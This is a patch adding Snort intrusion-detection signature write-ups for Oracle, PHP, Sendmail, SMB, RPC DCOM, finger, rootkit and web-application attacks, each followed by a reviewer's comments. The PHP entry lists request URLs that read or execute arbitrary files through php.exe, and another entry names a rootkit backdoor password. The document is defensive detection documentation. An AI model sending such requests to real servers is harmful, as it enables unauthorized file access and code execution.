+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
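Review bot: Ease of Attack says "Simple." but validate_flavor_definition in dbms_repcat is a PL/SQL package procedure that can only be invoked from an authenticated database session, so the rating should state that prerequisite (valid database credentials, or some other path that lets the attacker issue the call) instead of implying an unauthenticated remote overflow. Presentation in Detailed Information is broken: the procedure name is followed by a line containing only ". This procedure is included in", so join the sentence. Affected Systems reads "Oracle Oracle9i" (vendor name duplicated) and Additional References is empty; add the vendor alert or CVE that covers this dbms_repcat overflow and check there whether other releases are also affected.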
--- /dev/null
+++ b/doc/signatures/2917.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2917
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure switch_snapshot_master
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
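Review bot: the package is written fully qualified here ("sys.dbms_repcat_sna_utl") while the sibling Oracle entries in this patch give the package unqualified ("dbms_repcat"); use one convention across the files. A call to switch_snapshot_master in that package again needs a logged-in database session, so "Ease of Attack: Simple." should carry that qualification. The same broken line ". This procedure is included in" and the empty Additional References section seen in the other Oracle entries are present here and need the same fix.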
--- /dev/null
+++ b/doc/signatures/1773.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+1773
+
+--
+Summary:
+This event is generated when an attempt is made to access the executable file php.exe.
+
+--
+Impact:
+Severe - File execution and File access, due to a configuration error
+
+--
+Detailed Information:
+Apache servers can use the keyword "ScriptAlias" to create virtual folders. This is used to install PHP CGI (ScriptAlias /php/ "c:/php/"). 
+PHP version prior to an including 4.3.0 do not correctly check user input to this file. The executable php.exe can now be used to execute any file (even on different partitions) on the target host.
+
+
+--
+Affected Systems:
+PHP versions 4.3.0 and prior used on Apache web servers for windows.
+
+--
+Attack Scenarios:
+Read file: http://[targethost]/php/php.exe?c:\filetoread
+Execute file: http://[targethost]/php/php.exe?c:\filetoexecute
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+If the PHP version is newer than 4.3.0 this vulnerability can not be exploited.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Update PHP to the latest non affected version from www.php.net
+
+If the php.ini configuration file contains the keyword cgi.force_redirect this vulnerability can not be exploited.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
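Review bot: the Corrective Action line "If the php.ini configuration file contains the keyword cgi.force_redirect this vulnerability can not be exploited." is wrong as stated: the directive must be enabled (cgi.force_redirect = 1); merely being present, for instance as cgi.force_redirect = 0, gives no protection. The two Attack Scenarios URLs are identical in form ("/php/php.exe?c:\filetoread" and "/php/php.exe?c:\filetoexecute"), so explain the distinction: php.exe parses the named file, a file without PHP code has its contents returned, a file containing PHP code is executed. The False Positives entry ("If the PHP version is newer than 4.3.0 this vulnerability can not be exploited.") describes a non-vulnerable target, not a false positive; the rule still fires on any request for /php/php.exe, and that is what belongs there. Typos: "PHP version prior to an including 4.3.0" in Detailed Information, and Affected Systems should read "4.3.0 and prior" to match. Additional References is empty.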
--- /dev/null
+++ b/doc/signatures/332.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 332
+
+-- 
+
+Summary: 
+An intelligence gathering attack against the finger daemon
+
+-- 
+
+Impact:
+The attacker may obtain information about user accounts on the target system.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use a finger command against a host with a username of "0".  A finger query against a vulnerable finger daemon may allow the attacker to obtain a list of accounts on the target system with some details for each account where present (such as time and source of the last login). 
+
+Obtaining a list of accounts might precipitate further attacks such as password guessing, email attacks and other abuse.
+
+--
+
+Attack Scenarios:
+An attacker learns that the "sys" account exists on the system. He then proceeds to guess the password and is then able to gain remote access to the system.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS378
+http://www.whitehats.com/info/IDS131
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0197
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10069%20(Finger%20zero%20at%20host
+
+--
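Review bot: the Nessus URL in Additional References is mangled: "http://cgi.nessus.org/plugins/dump.php3?id=10069%20(Finger%20zero%20at%20host" has the plugin title URL-encoded onto the end with an unclosed parenthesis; it should stop at "id=10069", with the title, if wanted, on its own line. This file also lacks the Affected Systems section every other entry in the patch has; add one (hosts running a finger daemon that answers a query for user "0"). False Positives reads "None Known" although the rule fires on any finger lookup for the literal user "0"; rare, but say so.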
--- /dev/null
+++ b/doc/signatures/2268.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2268
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
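Review bot: Affected Systems says "All systems using Sendmail." while Detailed Information limits the flaw to "Sendmail prior to version 8.12.9"; carry the version bound into Affected Systems so an analyst can dismiss alerts against patched hosts. In Attack Scenarios "process code of their choosing" should be "execute code of their choosing", and Corrective Action has "verison". CA-2003-12 is the right CERT advisory for the prescan() flaw; add the CVE it cites next to it so the entry can be correlated with vulnerability scanners.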
--- /dev/null
+++ b/doc/signatures/918.txt
@@ -0,0 +1,62 @@
+SID:
+918
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
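Review bot: this file does not follow the layout the other signature documents in the patch use: the SID block precedes "Rule:", each "--" separator sits directly under the section text instead of after a blank line, and the final heading is "References:" rather than "Additional References:"; reorder and rename so any tooling that parses these files treats it like the rest. Typos: "This even indicates", "data can be accesses", "at type of writing". Attack Scenarios already states the attacker needs "permission to create pages on the server", which is consistent with the "Medium" rating, but the References section is empty and should cite the Allaire advisory that the Corrective Action ("Patches are available from Allaire, install them.") depends on.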
--- /dev/null
+++ b/doc/signatures/365.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+365
+
+--
+Summary:
+This event is generated when an external user pings an internal server using an echo request ICMP type. This may indicate an attempt to scan the network or cause a denial of service using a "ping flood." 
+
+--
+Impact:
+Possible information gathering or denial of service attempt. 
+
+--
+Detailed Information:
+An ICMP ping may indicate a scanning attempt, a ping flood, or a remote user attempting to see if the network responds.
+
+--
+Affected Systems:
+Any system that responds to a ping request.
+
+--
+Attack Scenarios:
+An attacker can use a scanner that pings a system to find out more information about the network, or the attacker can use a tool to send a large number of pings in an attempt to "flood" the network and create a denial of service condition.
+
+--
+Ease of Attack:
+Simple. Scanning and ping-based DoS tools are freely available.
+
+--
+False Positives:
+This rule will generate an alert if a legitimate remote user pings an internal server.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall to block ICMP ping packets with an ICMP type value of 8.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
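Review bot: the Summary says the rule fires whenever "an external user pings an internal server", so on an Internet-facing sensor it alerts on every inbound echo request, yet False Positives only mentions "a legitimate remote user" in passing; state plainly that this is an informational, high-volume rule normally run with a threshold or rate limit (or disabled) rather than treated as an attack indicator. Corrective Action, "block ICMP ping packets with an ICMP type value of 8", needs the caveat that dropping all echo requests at the perimeter also breaks legitimate reachability checks and that rate limiting is the usual alternative. Additional References is empty.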
--- /dev/null
+++ b/doc/signatures/3143.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3143
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
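Review bot: Corrective Action conflicts with the vulnerability described: Detailed Information and Attack Scenarios say the flaw is triggered by "a malicious response from a server in response to a client request", that is, it lives in the SMB client, so "Turn off windows file and print services." (which disables the server side on the victim) and "Use Samba as an alternative." do not remove the exposure. The effective mitigations are the vendor patch and blocking outbound SMB (TCP 139 and 445) to untrusted networks so clients cannot be lured to a hostile server. The document should also say that the attacker must induce the client to connect, for example via a UNC path embedded in a document or link, and that the rule therefore inspects server-to-client traffic, which determines where the sensor has to sit. Affected Systems lists "Microsoft Windows 2003"; use "Windows Server 2003" as the other files do.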
--- /dev/null
+++ b/doc/signatures/100000421.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000421
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Igloo" application running on a webserver. Access to the file "wiki.php" using a remote file being passed as the "c_node[class_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "c_node[class_path]" parameter in the "wiki.php" script used by the "Igloo" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Igloo
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
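Review bot: the Detailed Information and Attack Scenarios text is the generic CGI authentication boilerplate ("An attacker can access an authentication mechanism and supply his/her own credentials to gain access.") rather than a description of a remote file include through "c_node[class_path]" in "wiki.php"; replace it with the actual scenario (a URL to an attacker-controlled PHP file supplied in that parameter, which the application includes and executes). Because the parameter is written in array-index form, c_node[class_path], quote it exactly as the rule matches it, since a reader checking the rule will otherwise look for a plain "class_path". "Exploits exist." has no supporting reference and Additional References is empty; the boilerplate also carries the "ona web server" typo.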
--- /dev/null
+++ b/doc/signatures/1823.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1823
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
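Review bot: the Affected Systems section is empty and the Summary does not say what this rule actually matches (which traversal sequence, on which protocol or port), while Detailed Information speaks of "web, web applications and ftp servers" and Attack Scenarios of "the ftp root directory"; pick one, describe the pattern the rule keys on, and fill in Affected Systems (at minimum, FTP servers that do not confine the client to its root directory). Corrective Action lists only patching and upgrading; for FTP the configuration fix, confining users to their home or root directory (chroot), is the usual remedy and should be listed alongside.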
--- /dev/null
+++ b/doc/signatures/1513.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1513
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
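Review bot: this document does not identify the CGI application, script name or request pattern the rule matches, so nothing in it lets an analyst decide whether an alert is relevant; every other field (Impact, Attack Scenarios, "Exploits exist.") is generic and cannot be verified without that. Add the script or URI the rule keys on to the Summary and the product to Affected Systems, or mark the entry as a placeholder to be completed. Typo in Detailed Information: "ona web server".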
--- /dev/null
+++ b/doc/signatures/1578.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1578
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
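Review bot: like the 1513 entry in this patch, this text never says what the rule detects: "Many known vulnerabilities exist for each implementation and the attack scenarios are legion." and "Exploits exist." describe web servers in general, not SID 1578. Name the URI, header or payload the rule looks for and the products it applies to; without that, "Affected Systems: All systems using a web server." and "False Positives: None known." cannot both hold, because a generic URI match will fire on legitimate traffic. Additional References is empty.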
--- /dev/null
+++ b/doc/signatures/2806.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2806
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure set_local_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
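Review bot: same layout defects as the other dbms_repcat entries: the procedure name set_local_flavor is followed by a stray line ". This procedure is included in", Affected Systems reads "Oracle Oracle9i", and Additional References is empty. Since the three Oracle entries in this patch share everything but the procedure name, each should cross-reference the others (validate_flavor_definition, switch_snapshot_master) and state that all of them require an authenticated database session, so that an alert is correlated with the database audit trail for the session that issued the call rather than treated as an external attack on its own.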
--- /dev/null
+++ b/doc/signatures/3249.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3249
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
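Review bot: this file is a verbatim copy of the 3164 and 3169 entries in this patch; a reader cannot learn from it what distinguishes SID 3249. At minimum the Summary should name the specific RPC interface or request the rule matches and Additional References should cite the bulletin; otherwise collapse the three into one shared description with a per-SID line. "Expoit" in Ease of Attack is misspelled.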
--- /dev/null
+++ b/doc/signatures/3169.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3169
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
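Review bot: identical text to the 3164 and 3249 entries in this patch, with the same empty Additional References section and the "Expoit" typo, and the same missing statement of what SID 3169 specifically matches. One further point on the Corrective Action block shared by all three: "Block access to RPC ports 135, 139 and 445 for both TCP and UDP protocols from external sources" is sound, but add that this only reduces exposure from outside the perimeter; hosts on the same segment can still reach the service, so the vendor patch remains the real fix.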
--- /dev/null
+++ b/doc/signatures/219.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+219
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "StoogR". This is a known password for 
+the HidePak rootkit.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
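Review bot: Corrective Action ends with "Delete the Trojan and kill any associated processes.", which is inadequate for HidePak: the Summary itself calls it a rootkit, and a rootkit hides files and processes from the administrator, so the host should be treated as fully compromised and rebuilt from known-good media, with any credentials used on it rotated. The Detailed Information line "This Trojan affects UNIX operating systems:" ends in a colon with nothing following, and the file has no Affected Systems section; move that fact there. "Trojan" and "rootkit" are used interchangeably; pick the term that fits the tool. False Positives says "None Known" although the rule matches a literal string ("StoogR") in Telnet traffic, so a legitimate password or text containing it would fire; say so.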
--- /dev/null
+++ b/doc/signatures/100000821.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000821
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VBZooM" application running on a webserver. Access to the file "sub-join.php" with SQL commands being passed as the "UserID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "UserID" parameter in the "sub-join.php" script used by the "VBZooM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZooM
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
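Review bot: Corrective Action only says to patch, yet Attack Scenarios states the injection works "if user input is not correctly sanitized or checked before passing that input to the database"; add the code-level fix (parameterised queries, or at least validating "UserID" as an integer before it reaches the query) and least-privilege database credentials for the web application, since the Impact claims of administrative access and arbitrary code execution depend entirely on what the application's database account is permitted to do. The paragraph beginning "This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server." is generic boilerplate that does not describe SQL injection; drop or rewrite it. The only reference is a general article on SQL injection, not an advisory for the VBZooM flaw that "Exploits exist." relies on.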
--- /dev/null
+++ b/doc/signatures/711.txt
